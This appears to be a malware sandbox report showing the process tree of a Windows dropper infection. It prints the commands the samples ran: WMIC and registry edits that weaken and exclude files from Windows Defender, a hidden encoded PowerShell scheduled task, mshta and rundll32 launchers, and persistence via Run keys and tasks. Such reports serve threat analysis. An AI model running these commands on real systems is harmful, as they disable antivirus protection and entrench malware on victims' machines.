C:\Users\Admin\Documents\2y2dpyBIo0eBGvITmCD5w9i3.exe"C:\Users\Admin\Documents\2y2dpyBIo0eBGvITmCD5w9i3.exe"9⤵PID:3760
-
C:\Users\Admin\Documents\1xJ3KHmFHppradNtzQPCUavg.exe"C:\Users\Admin\Documents\1xJ3KHmFHppradNtzQPCUavg.exe"9⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\7zSCEEA.tmp\Install.exe.\Install.exe10⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\7zSD1A9.tmp\Install.exe.\Install.exe /S /site_id "668658"11⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:6708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &12⤵PID:8700
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
- Checks processor information in registry
PID:8580 -
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:10460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:11124
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:4920
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"13⤵PID:6872
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:4544
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:11624
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"13⤵PID:11908
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:17064
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:17076
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:16852
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"13⤵PID:11972
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:16868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:11188
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:15720
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"12⤵PID:5280
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&13⤵PID:10896
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3214⤵PID:12176
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6414⤵PID:1180
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"12⤵PID:10492
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&13⤵
- Blocklisted process makes network request
PID:4752 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3214⤵PID:12204
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6414⤵PID:9572
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gydHPhxEz" /SC once /ST 06:06:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="12⤵
- Creates scheduled task(s)
PID:11060 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gydHPhxEz"12⤵PID:11920
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gydHPhxEz"12⤵PID:12504
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 21:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe\" XY /site_id 668658 /S" /V1 /F12⤵
- Creates scheduled task(s)
PID:12348 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bEwGusBEGbIeKSSfjR"12⤵PID:15292
-
C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"9⤵PID:9608
-
C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"10⤵
- Modifies data under HKEY_USERS
PID:16744 -
C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"9⤵PID:1604
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )10⤵PID:9976
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe" ) do taskkill -iM "%~nxq" /f11⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G12⤵PID:7076
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )13⤵PID:10272
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f14⤵PID:9384
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs13⤵
- Loads dropped DLL
PID:1148 -
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "U0_ScxFgwNG5I8y9H9sWqx5C.exe" /f12⤵
- Kills process with taskkill
PID:11152 -
C:\Users\Admin\Documents\HcY5k_KrNgbxj3FPdJLM6vgP.exe"C:\Users\Admin\Documents\HcY5k_KrNgbxj3FPdJLM6vgP.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5664 -
C:\Users\Admin\Documents\HqrDkLy8rEXTDVd9BAng1BxY.exe"C:\Users\Admin\Documents\HqrDkLy8rEXTDVd9BAng1BxY.exe"9⤵PID:9780
-
C:\ProgramData\7714914.exe"C:\ProgramData\7714914.exe"10⤵PID:2104
-
C:\ProgramData\8626517.exe"C:\ProgramData\8626517.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5180 -
C:\Users\Admin\Documents\xMG1YvfSVxm8eGMk6qzGDXsN.exe"C:\Users\Admin\Documents\xMG1YvfSVxm8eGMk6qzGDXsN.exe" /mixtwo9⤵PID:6996
-
C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"9⤵PID:11016
-
C:\Users\Admin\AppData\Local\Temp\is-V6JFQ.tmp\4J_1KMFJgm5oelcgvSUkuzC9.tmp"C:\Users\Admin\AppData\Local\Temp\is-V6JFQ.tmp\4J_1KMFJgm5oelcgvSUkuzC9.tmp" /SL5="$1071E,506127,422400,C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"10⤵PID:11204
-
C:\Users\Admin\AppData\Local\Temp\is-6DLA5.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-6DLA5.tmp\Chmenka.exe" /S /UID=12411⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:13144 -
C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe"C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe" /VERYSILENT12⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\is-O26LI.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-O26LI.tmp\IDownload.tmp" /SL5="$107A8,994212,425984,C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:10396 -
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu14⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
PID:11200 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3y-ujjsh.cmdline"15⤵PID:11316
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF317.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF316.tmp"16⤵PID:18748
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 138415⤵PID:7868
-
C:\Users\Admin\AppData\Local\Temp\69-6b3b1-e43-93b9c-8ac0f6df16aab\Wesefesikae.exe"C:\Users\Admin\AppData\Local\Temp\69-6b3b1-e43-93b9c-8ac0f6df16aab\Wesefesikae.exe"12⤵
- Checks computer location settings
PID:10296 -
C:\Users\Admin\AppData\Local\Temp\c5-a3148-a84-a9cb4-2cb93ad848d04\SHexeshushufi.exe"C:\Users\Admin\AppData\Local\Temp\c5-a3148-a84-a9cb4-2cb93ad848d04\SHexeshushufi.exe"12⤵PID:6004
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe /eufive & exit13⤵PID:17884
-
C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe /eufive14⤵PID:7396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:18672
-
C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exeC:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe /qn CAMPAIGN="654"14⤵PID:11512
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe & exit13⤵PID:19136
-
C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exeC:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe14⤵PID:11076
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe /mixfive & exit13⤵PID:18804
-
C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe /mixfive14⤵PID:11448
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jrx2ov3.d3n\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
PID:4932 -
C:\Users\Admin\Documents\VgxjiSGx9LEXIJ_mHyRpHj7y.exe"C:\Users\Admin\Documents\VgxjiSGx9LEXIJ_mHyRpHj7y.exe"9⤵PID:7728
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:9916 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:9908 -
C:\Users\Admin\Documents\vtgIjuPpGRvQUrQN1CGwNEFc.exe"C:\Users\Admin\Documents\vtgIjuPpGRvQUrQN1CGwNEFc.exe"7⤵PID:592
-
C:\Users\Admin\AppData\Roaming\2243620.scr"C:\Users\Admin\AppData\Roaming\2243620.scr" /S8⤵PID:8620
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2026c04e7218e1.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2026c04e7218e1.exeThu2026c04e7218e1.exe6⤵
- Executes dropped EXE
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\is-DU44Q.tmp\Thu2026c04e7218e1.tmp"C:\Users\Admin\AppData\Local\Temp\is-DU44Q.tmp\Thu2026c04e7218e1.tmp" /SL5="$7002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2026c04e7218e1.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\is-1N2I0.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-1N2I0.tmp\___YHDG34.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe"C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\is-G2515.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-G2515.tmp\ultramediaburner.tmp" /SL5="$7007A,281924,62464,C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5448 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
- Executes dropped EXE
PID:5772 -
C:\Users\Admin\AppData\Local\Temp\2f-f7325-54a-8f19c-7df238870272e\Gysafaemura.exe"C:\Users\Admin\AppData\Local\Temp\2f-f7325-54a-8f19c-7df238870272e\Gysafaemura.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
PID:5336 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 222810⤵PID:12896
-
C:\Users\Admin\AppData\Local\Temp\a6-46991-c2f-6deae-97dfc311aae41\Quvovaekaky.exe"C:\Users\Admin\AppData\Local\Temp\a6-46991-c2f-6deae-97dfc311aae41\Quvovaekaky.exe"9⤵
- Executes dropped EXE
PID:5456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe /eufive & exit10⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe /eufive11⤵
- Executes dropped EXE
PID:6684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exeC:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe /qn CAMPAIGN="654"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6148 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631826465 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:9576
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe & exit10⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exeC:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe11⤵
- Executes dropped EXE
PID:7140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe /mixfive & exit10⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe /mixfive11⤵
- Executes dropped EXE
PID:6152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ql4spmkl.k4l\autosubplayer.exe /S & exit10⤵
- Suspicious use of SetWindowsHookEx
PID:6500 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2090b5515d63b2.exe5⤵PID:4248
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2090b5515d63b2.exeThu2090b5515d63b2.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2025d6674aed72ba.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2025d6674aed72ba.exeThu2025d6674aed72ba.exe /mixone6⤵
- Executes dropped EXE
PID:1788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 6567⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 6727⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 6807⤵
- Program crash
PID:2140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 7287⤵
- Program crash
PID:4520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 8887⤵
- Program crash
PID:4456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20fdd9ac35a68.exe5⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20fdd9ac35a68.exeThu20fdd9ac35a68.exe6⤵
- Executes dropped EXE
PID:3224 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203cdb52ef3c6580d.exe5⤵PID:2828
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exeThu203cdb52ef3c6580d.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exeC:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exe7⤵
- Executes dropped EXE
PID:640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20bc9ea26f.exe5⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\8E7A.exeC:\Users\Admin\AppData\Local\Temp\8E7A.exe2⤵
- Suspicious use of SetThreadContext
PID:9656 -
C:\Users\Admin\AppData\Local\Temp\8E7A.exeC:\Users\Admin\AppData\Local\Temp\8E7A.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:10192 -
C:\Users\Admin\AppData\Local\Temp\9794.exeC:\Users\Admin\AppData\Local\Temp\9794.exe2⤵
- Suspicious use of SetThreadContext
PID:9784 -
C:\Users\Admin\AppData\Local\Temp\9794.exeC:\Users\Admin\AppData\Local\Temp\9794.exe3⤵PID:7688
-
C:\Users\Admin\AppData\Local\Temp\AA61.exeC:\Users\Admin\AppData\Local\Temp\AA61.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10176 -
C:\Users\Admin\AppData\Local\Temp\BB89.exeC:\Users\Admin\AppData\Local\Temp\BB89.exe2⤵PID:9428
-
C:\Users\Admin\AppData\Local\Temp\BF24.exeC:\Users\Admin\AppData\Local\Temp\BF24.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9600 -
C:\Users\Admin\AppData\Local\Temp\1515.exeC:\Users\Admin\AppData\Local\Temp\1515.exe2⤵PID:9828
-
C:\Users\Admin\AppData\Local\Temp\1515.exeC:\Users\Admin\AppData\Local\Temp\1515.exe3⤵
- Adds Run key to start application
PID:8028 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\bca106d2-155a-4288-a1bc-2ca8798ce8c3" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:9528 -
C:\Users\Admin\AppData\Local\Temp\1515.exe"C:\Users\Admin\AppData\Local\Temp\1515.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
PID:10288 -
C:\Users\Admin\AppData\Local\Temp\1515.exe"C:\Users\Admin\AppData\Local\Temp\1515.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:4576
-
